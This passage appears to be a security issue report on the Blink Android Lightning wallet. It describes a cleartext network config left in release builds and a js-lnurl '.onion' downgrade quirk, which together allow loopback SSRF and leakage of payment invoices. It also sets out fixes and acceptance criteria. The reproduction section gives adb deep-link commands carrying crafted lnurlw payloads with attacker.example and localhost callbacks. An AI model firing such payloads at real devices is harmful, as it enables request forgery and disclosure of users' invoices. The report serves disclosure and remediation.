urlObject.searchParams.set("pr", withdrawalInvoice.paymentRequest)
const result = await fetch(urlObject.toString())
```

`callback` originates from `getParams()` in `js-lnurl@0.6.0`, whose `decodelnurl` helper performs **no scheme validation** — a bech32 `lnurl1…` payload is returned verbatim, whatever it decodes to. It also contains a downgrade quirk worth knowing about:

```ts
// js-lnurl/src/helpers/decodelnurl.ts
let [_, post] = lnurl.split('://')
let pre = post.match(/\.onion($|\W)/) ? 'http' : 'https'
return pre + '://' + post
```

The `.onion` test runs against the whole remainder of the string, not the host. `lnurlw://evil.example/.onion/cb?tag=withdrawRequest&…` matches `\.onion/` and is rewritten to **`http://`** on a clearnet host — an attacker-controlled HTTPS→HTTP downgrade with no bech32 needed.

Chaining that with the NSC exception gives a concrete release-build primitive. An attacker-supplied LNURL — delivered by QR scan, an NFC tag ([`app/components/modal-nfc/modal-nfc.tsx` L91–L149](https://github.com/GaloyMoney/blink-mobile/blob/8727998d16c334581f2d0f3d7d82a19ec2703ecf/app/components/modal-nfc/modal-nfc.tsx#L91-L149)), or a `lnurlw://` deep link into the exported `MainActivity` ([[manifest L72–L78](https://github.com/GaloyMoney/blink-mobile/blob/8727998d16c334581f2d0f3d7d82a19ec2703ecf/android/app/src/main/AndroidManifest.xml#L72-L78)](https://github.com/GaloyMoney/blink-mobile/blob/8727998d16c334581f2d0f3d7d82a19ec2703ecf/android/app/src/main/AndroidManifest.xml#L72-L78)) — carrying a callback of `http://localhost:<port>/<attacker path>` will be fetched successfully, because loopback is on the allowlist. That yields:

- **Loopback SSRF.** A cleartext `GET` to any HTTP service bound on the device's loopback interface, with attacker-controlled port, path, and query, issued from Blink's process. Other installed apps and `adb reverse` tunnels routinely bind loopback ports.
- **A response oracle.** The JSON `reason` field from the response is rendered straight into a user-visible `Alert` ([`use-lnurl-withdraw.ts` L51](https://github.com/GaloyMoney/blink-mobile/blob/8727998d16c334581f2d0f3d7d82a19ec2703ecf/app/screens/receive-bitcoin-screen/hooks/use-lnurl-withdraw.ts#L51)) and into `lnServiceErrorReason` in the redemption hook, leaking a slice of the loopback response back to whoever staged the QR/tag.
- **BOLT11 disclosure in cleartext.** `k1` and the freshly minted `pr` are appended as query parameters to that request.

Scoping the NSC to debug builds closes the loopback hole. It does not close Finding 4 — an `http://` callback to a public host is still constructed and attempted, it just fails at the platform layer, and the equivalent request over `https://` to an attacker-chosen host is unaffected. **Finding 4 still needs its own fix.**

---

## Reproduction

**Confirm the attribute in a release artifact:**

```bash
./gradlew :app:assembleRelease
aapt2 dump xmltree android/app/build/outputs/apk/release/app-release.apk \
  --file AndroidManifest.xml | grep -E 'usesCleartextTraffic|networkSecurityConfig'
# → A: android:usesCleartextTraffic(0x0101027b)=(type 0x12)0xffffffff
# → A: android:networkSecurityConfig(0x01010527)=@0x7f1?????
```

Also inspect `android/app/build/intermediates/merged_manifests/release/AndroidManifest.xml`.

**Confirm the loopback exception ships in release:**

```bash
aapt2 dump resources android/app/build/outputs/apk/release/app-release.apk | grep -i network_security
# the res/xml/network_security_config.xml entry is present in the release APK
```

**Confirm the runtime behaviour (release build, real device or emulator):**

```bash
# denied — global cleartext is off despite line 41
adb shell am start -a android.intent.action.VIEW \
  -d "lnurlw://attacker.example/cb?tag=withdrawRequest&k1=deadbeef&callback=http%3A%2F%2Fattacker.example%2Fcb"

# permitted — loopback is on the NSC allowlist
adb shell am start -a android.intent.action.VIEW \
  -d "lnurlw://attacker.example/cb?tag=withdrawRequest&k1=deadbeef&callback=http%3A%2F%2Flocalhost%3A8080%2Fprobe"
```

Run a listener on `localhost:8080` on the device (or `adb reverse tcp:8080 tcp:8080`) and observe the inbound `GET /probe?k1=…&pr=lnbc…`.

---

## Proposed fix

**1. Delete line 41 and the stale comment on line 34.** Nothing in the app needs global cleartext.

```diff
     <!-- TODO android:roundIcon="@mipmap/ic_launcher_round" -->
-    <!-- android:usesCleartextTraffic="true" for https://github.com/onfido/WebViewRN/tree/main#android -->
     <application
       android:name=".MainApplication"
       android:label="@string/app_name"
       android:icon="@mipmap/ic_launcher"
       android:roundIcon="@mipmap/ic_launcher"
       android:allowBackup="false"
-      android:usesCleartextTraffic="true"
       android:networkSecurityConfig="@xml/network_security_config"
```

**2. Make the release policy explicit rather than implicit.** Replace `src/main/res/xml/network_security_config.xml` with a config that states the intent and carries no exceptions:

```xml
<?xml version="1.0" encoding="utf-8"?>
<network-security-config>
    <base-config cleartextTrafficPermitted="false">
        <trust-anchors>
            <certificates src="system" />
        </trust-anchors>
    </base-config>
</network-security-config>
```

This makes the release posture survive the removal of any other line and mirrors the iOS ATS settings.

**3. Move the Detox/emulator exception into the debug source set** at `android/app/src/debug/res/xml/network_security_config.xml`, where the resource merger will override the main one for debug builds only:

```xml
<?xml version="1.0" encoding="utf-8"?>
<network-security-config>
    <base-config cleartextTrafficPermitted="false">
        <trust-anchors>
            <certificates src="system" />
            <certificates src="user" />
        </trust-anchors>
    </base-config>
    <domain-config cleartextTrafficPermitted="true">
        <domain includeSubdomains="true">10.0.2.2</domain>
        <domain includeSubdomains="true">localhost</domain>
    </domain-config>
</network-security-config>
```

The `<debug-overrides>` element is an alternative, but a debug-variant resource is clearer here since the whole exception is variant-scoped.

**4. Drop the stale Onfido comments** on `AndroidManifest.xml` L22 and `src/debug/AndroidManifest.xml` L12, and confirm whether `SYSTEM_ALERT_WINDOW` / `READ_EXTERNAL_STORAGE` / `WRITE_EXTERNAL_STORAGE` are still required now that Onfido is gone. `SYSTEM_ALERT_WINDOW` in particular is a sensitive permission that draws Play review attention.

**5. Verify the "Local" instance still works after the change.** [`app/config/galoy-instances.ts` L125–L137](https://github.com/GaloyMoney/blink-mobile/blob/8727998d16c334581f2d0f3d7d82a19ec2703ecf/app/config/galoy-instances.ts#L125-L137) points `graphqlUri`, `authUrl`, `posUrl`, `kycUrl`, and `fiatUrl` at `http://<metro-host>:4455` / `:3000`. Under the debug NSC above this keeps working on emulator (`10.0.2.2`) and via `adb reverse` (`localhost`), but **not** when Metro is reached over a LAN IP such as `192.168.x.x`. If anyone develops that way, add their range to the debug config or use `adb reverse`. Selecting "Local" in a release build will now fail closed — which is the desired behaviour.

**6. Track Finding 4 separately.** Neither change above prevents an attacker-supplied `https://` callback, and neither addresses the `js-lnurl` `.onion` downgrade quirk. The application-layer fix belongs in the withdraw hooks:

```ts
const urlObject = new URL(callback)
if (urlObject.protocol !== "https:") {
  throw new Error("LNURL callback must use https")
}
```

Consider also rejecting loopback, link-local, and RFC 1918 hosts, and asserting that the callback origin matches the origin the LNURL params were fetched from (per [[LUD-03](https://github.com/lnurl/luds/blob/luds/03.md)](https://github.com/lnurl/luds/blob/luds/03.md)).

---

## Acceptance criteria

- [ ] `usesCleartextTraffic` is absent from the merged **release** manifest (`aapt2 dump xmltree` on the release APK shows no such attribute).
- [ ] The release `network_security_config.xml` contains an explicit `<base-config cleartextTrafficPermitted="false">` and no `<domain-config>` exceptions.
- [ ] `10.0.2.2` / `localhost` cleartext is permitted in debug builds only; Detox e2e still passes.
- [ ] A release build fails to reach `http://localhost:<port>/…` supplied via an LNURL withdraw callback.
- [ ] No `onfido` references remain in `android/`; retained permissions have a current, documented justification.
- [ ] A follow-up issue exists for Finding 4 (callback scheme allowlist + origin check).

---

## References

- [[Network security configuration — Android Developers](https://developer.android.com/privacy-and-security/security-config)](https://developer.android.com/privacy-and-security/security-config)
- [[Protecting against unintentional regressions to cleartext traffic in your Android apps — Android Developers Blog](https://android-developers.googleblog.com/2016/04/protecting-against-unintentional.html)](https://android-developers.googleblog.com/2016/04/protecting-against-unintentional.html)
- [[Bypassing Android's Network Security Configuration — NCC Group](https://www.nccgroup.com/research/bypassing-android-s-network-security-configuration/)](https://www.nccgroup.com/research/bypassing-android-s-network-security-configuration/)
- [`[nbd-wtf/js-lnurl](https://github.com/nbd-wtf/js-lnurl)`](https://github.com/nbd-wtf/js-lnurl) — `src/helpers/decodelnurl.ts`
- [LUD-03: `withdrawRequest` base spec](https://github.com/lnurl/luds/blob/luds/03.md) · [[LUD-17: Protocol schemes and raw URLs](https://github.com/lnurl/luds/blob/luds/17.md)](https://github.com/lnurl/luds/blob/luds/17.md)